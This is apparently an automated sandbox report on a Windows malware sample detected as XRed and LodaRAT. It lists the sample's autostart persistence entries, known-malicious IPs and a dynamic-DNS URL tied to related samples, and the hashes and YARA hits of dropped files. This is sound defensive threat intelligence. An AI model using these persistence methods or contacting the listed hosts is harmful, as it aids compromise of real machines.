                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com, onedscolprdweu10.westeurope.cloudapp.azure.com
                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 6192 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:23:03 | API Interceptor | 379x Sleep call for process: Synaptics.exe modified
05:23:57 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:22:59 | Task Scheduler | Run new task: HBMQLS.exe path: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
11:23:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HBMQLS "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
11:23:09 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:23:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HBMQLS "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
11:23:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  172.111.138.100mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                          RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                              Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                  gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    dlawt.exeGet hashmaliciousLodaRatBrowse
69.42.215.252 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | zhuzhu.exe | malicious | GhostRat, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | RNEQTT.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ZmrwoZsbPp.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ccmsetup.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Synaptics.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | RezQY7jWu8.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match | Associated Sample Name / URL | Detection | Threat Name | Context
freedns.afraid.org | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
freedns.afraid.org | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
freedns.afraid.org | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | ccmsetup.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Synaptics.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | RezQY7jWu8.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
VOXILITYGB | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | loligang.mips.elf | malicious | Mirai | 104.250.189.221
VOXILITYGB | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | RNEQTT.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | malicious | Remcos | 104.243.246.120
VOXILITYGB | nabsh4.elf | malicious | Unknown | 46.243.206.70
VOXILITYGB | 7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
VOXILITYGB | fACYdCvub8.exe | malicious | Unknown | 5.254.60.108
AWKNET-LLCUS | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
AWKNET-LLCUS | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
AWKNET-LLCUS | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | ccmsetup.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Synaptics.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | RezQY7jWu8.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | zhuzhu.exe | malicious | GhostRat, XRed | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | Lets-x64.exe | malicious | Nitol, Zegost | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | KL-3.1.16.exe | malicious | Nitol, Zegost | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | Whyet-4.9.exe | malicious | Nitol, Zegost | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | QQyisSetups64.exe | malicious | GhostRat | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | wyySetups64.exe | malicious | GhostRat | 142.250.186.110, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | aYu936prD4.exe | malicious | Unknown | 142.250.186.110, 142.250.186.33
                                                                                                                                      No context
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
Preview:<?xml version="1.0" encoding="UTF-16"?> <HeartbeatCache/>
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65536
                                                                                                                                      Entropy (8bit):1.1336184905842195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:PluVpsRImE0jM3ODzJDzqjLOA/FFmOVzuiFCZ24IO8EKDzy:IyRFjM3OJqjEqzuiFCY4IO8zy
                                                                                                                                      MD5:C3E3D151F97FA194004517DCDCC7B23F
                                                                                                                                      SHA1:F03E481BD3C625398BC2F90F16E3D98BD0D49C68
                                                                                                                                      SHA-256:80A024940CE898B6D35DCEDFB1AAC8C25816014C592E2F443234D38F12BB873C
                                                                                                                                      SHA-512:A1C738C05E855F1A713FD350E8EF8161EA86C79A4C2C34848BA0DB266E677BFA6A5A2894980A079FDD1603CE21C1E9098890B319B217B413BC940E63D1E4DEFA
                                                                                                                                      Malicious:false
Preview:Version=1 EventType=APPCRASH EventTime=133800278237764899 ReportType=2 Consent=1 UploadTime=133800278352921271 ReportStatus=524384 ReportIdentifier=81f95d88-96f6-4cc4-92a6-2d5723e77ae4 IntegratorReportIdentifier=b65de824-2c18-47e9-af4b-660ceb5bf698 Wow64Host=34404 Wow64Guest=332 NsAppName=Synaptics.exe AppSessionGuid=00001830-0001-0014-c222-d9caa45adb01 TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!00006c2baa72ea5d08b6583893b01001e540213f4aaf!Synaptics.exe TargetAppVe
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:23:47 2024, 0x1205a4 type
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4388144
                                                                                                                                      Entropy (8bit):2.0983871520139474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:yYiHXBRNVhv7vibaokuVsDwDO+nbVbUkwNP:yYixV17yzku68bRbc
                                                                                                                                      MD5:30AB73C2A91AED4B07DE0FDCD749F186
                                                                                                                                      SHA1:F116CC903F1E7BE4A3C478AEA325052A0B3D4332
                                                                                                                                      SHA-256:7E54A12FF27440EEA04E11F5F4AE93054AD289E326879439379A6B0CDB119432
                                                                                                                                      SHA-512:AFBE24CAC909C2884DC9AFAEC538568960E6DC26EB6028E89E9ED87C59A01AA706E9FBEFCA00E4A8E717704CF8E88D5122679C4AD5243B43F115EF6E6AFA2098
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6304
                                                                                                                                      Entropy (8bit):3.7191366439548785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:R6l7wVeJTxD6HsjzYiSqS/pDZ89b/l7sff1m:R6lXJZ6HsXYSp/lAfA
                                                                                                                                      MD5:5D24823AAF20F16076E48327668B240E
                                                                                                                                      SHA1:CF18FFB6D8EB5ECBB0469940D49BA9B02945C5EA
                                                                                                                                      SHA-256:5239A4249B8B307415013D26A0A56FB9F177CE914E5B38CBB46B672388462CEC
                                                                                                                                      SHA-512:78F1A27D038ECEB16EB21E1A262B3AF0011866C0499741AA66ACC3A21C958C23DBC27A17567347B8CF8F2C7F1A190B037793496A2BC2CFAFC5C31E8B39250696
                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6192</Pi
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4572
                                                                                                                                      Entropy (8bit):4.44237744906499
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:cvIwWl8zs4MuJg77aI9zgWpW8VY+PYm8M4JFWFjB+q84Yc5Z3d:uIjfXkI7tZ7VrSJw+mZ3d
                                                                                                                                      MD5:BE098A429CA3CFF39C5C4BF92AA7A269
                                                                                                                                      SHA1:721A02D9985B4113D72F208567036F8A7159D2F0
                                                                                                                                      SHA-256:3B7D7BE239D5F9C1DD411E38CB5D7C8FA2DF66DA90A3E1F20663E7F3222FE545
                                                                                                                                      SHA-512:357A9EAAC56EDDC75534EFB3AEDFD2817EC686443F70327D9C578D75D7FEE37B55F320F366D685ACC18760B66058E9CAD144420F429EA5A0B7CDF99D7DA18270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):771584
                                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1723904
                                                                                                                                      Entropy (8bit):7.463863136848696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                      MD5:71386F37F17778126296CA734975DB6D
                                                                                                                                      SHA1:353818DCD74D06565FC0E8AC4416E594D29ECD0B
                                                                                                                                      SHA-256:C1317DA0FD0DC3D73B38634EA586016F6F651F52ACC576FBAE8B82721C83E9AE
                                                                                                                                      SHA-512:E5E0D87F91611BCCFEA16222C9AFB7AC7B949F1762244CED01F9D8A78E2C992CFE8C1FAAF1391F4CF107604A0E9F7A64FA4ADDA1C339D8DC85B27E7BE610B83C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2583758431415335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0hASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2A+pAZewRDK4mW
                                                                                                                                      MD5:BF18B7D5E1AD23035CAD13A7933DF197
                                                                                                                                      SHA1:896CE74C80294932CE6C950CC2A6F33A8A88BC29
                                                                                                                                      SHA-256:BC5554BF04B3DEA7DDEE20573157A1E173697B1328E531C95D360045AB1AC641
                                                                                                                                      SHA-512:18DBCCDF44E214904220763619D69AB449F4A47D123CC76D2D809E50CB3A10626B4DA6637E844593872BADBF9033B183A72C551E33EA5765322F66F9A6D60D3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yVSE9EYMdAQc4co601ewag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.271656582148378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                      MD5:6E6B9218FFFE0432A50AE6A8556598D7
                                                                                                                                      SHA1:285042B145A8ED75A2791312B290826F9824CD49
                                                                                                                                      SHA-256:359FD4AD2110814AAB63F8316D04C2B33053383D20F2DD363A8531A3DB1D1685
                                                                                                                                      SHA-512:AB0C05428C61808DA3C60CD1329D7F5C1C5561CCC35E360BD174CD54549E10E7FE92310EE6F4B486BB87D8F5E95D7DC45EE678B495EDD0611B05CCA81E893369
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.266454790412181
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PnL/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                      MD5:1C4B85443629453930580A142A5F3572
                                                                                                                                      SHA1:81D5F9DC41E8021933C1D7F5019F7A5D3C817364
                                                                                                                                      SHA-256:4636523B4E8B0C17B46E0B77217ED0FEF71077810530F5E372D494B848BC9FF8
                                                                                                                                      SHA-512:885CDF687BDB3A90CA7AD1A4F1B3A4F6211B169CFCFE8B149DFEBBA9BF9B30D6DF77BC44DD461C284978408A01687EE21D7A090BE9A61435ACFCAF9FBC231D80
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.268592928329608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+04zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JX+pAZewRDK4mW
                                                                                                                                      MD5:9A665E367DA5CB572BE0753F6411383B
                                                                                                                                      SHA1:D6E9301AB0157FEA6410E48C62D543F1B9E02219
                                                                                                                                      SHA-256:C69805276169F11A7306CA1B893301B184E43D244077A50141684A04B7AE362D
                                                                                                                                      SHA-512:297C76DE56A7DA630310DFFF231001A757F2FDB4586AE8B5951B209D268B2CCA059A014F3BCF82BFE0ECAE50F00DFB765392B8B3C4BC550F6BCD74B3DC5DC806
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.259329214978537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+063SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J3+pAZewRDK4mW
                                                                                                                                      MD5:4240554A539ABF2F5F57438A56A9CDD1
                                                                                                                                      SHA1:404408D9BAC2AA91B8AA4BCAAB950BFF60D49F03
                                                                                                                                      SHA-256:110FE53BA6EDD4F41A35544DA86BDF2E3CF93265AAF01C4EBE2D104936CE4D53
                                                                                                                                      SHA-512:9AC828BB9887E08D45FAEFDB1D1CE6FFB93860F26ED90A83D1A2BEAF684CCC878F98D5E79F2E80850A944F49291825C6398EB63ADAF131ABC17807EDCEC37C04
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257877041805281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0glSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                      MD5:EA0CB80D24F4B815C88C24239F77C8DE
                                                                                                                                      SHA1:269368106B1105B9B0A9F1BF042262F9496CB644
                                                                                                                                      SHA-256:05CF6BD80858C099D0DE14CA73B27F135BE34AE5196BEB322CE54DCCFE9BDEC1
                                                                                                                                      SHA-512:0E5407CBF24B2C73DA53378D8CE4C1A942F889553326FA54706B9ED31EC66C77EB03B6BB085C686032B9E8189C0E734D8385C95D5B97148663652D4566E9314E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.262803017833971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0HkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0k+pAZewRDK4mW
                                                                                                                                      MD5:3980DE18D7C4336319035F20EC9A1ACB
                                                                                                                                      SHA1:AA6D88FACEDD8F259CAE71FD2D8D493FE4E56BA6
                                                                                                                                      SHA-256:8E8ED2AB6CA3A757410F6C6B18E91B2D62D2F5C1FB1FBF3D3DBCB346A109BE7A
                                                                                                                                      SHA-512:3DC40AD0CFC995A631897380BF089D155589E0CF743FC56B1B302E0CBCAD0744AC3796041F2FA17CBCD9F545EEF2F55D0BA04D85A7B67B6864C6C7532C02BC00
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2550302368069515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0IH3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NX+pAZewRDK4mW
                                                                                                                                      MD5:F52319A29B19E5B6104E19BBA4ACB1ED
                                                                                                                                      SHA1:8EF77A4BFA43FDD88A06C5E7591D55582E5881E5
                                                                                                                                      SHA-256:28AF3875321A24007F6F68CC808B586EAE13C20C41BA6D482F700E0B71AF0A10
                                                                                                                                      SHA-512:CFA194033227F29504E8E11B30D2A0B392BFFD218879305B1CFF38994D3D0642FC968BBB21107C60DF9662368C79094E1493898026821B032316B9F8C119ED80
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.249958582557942
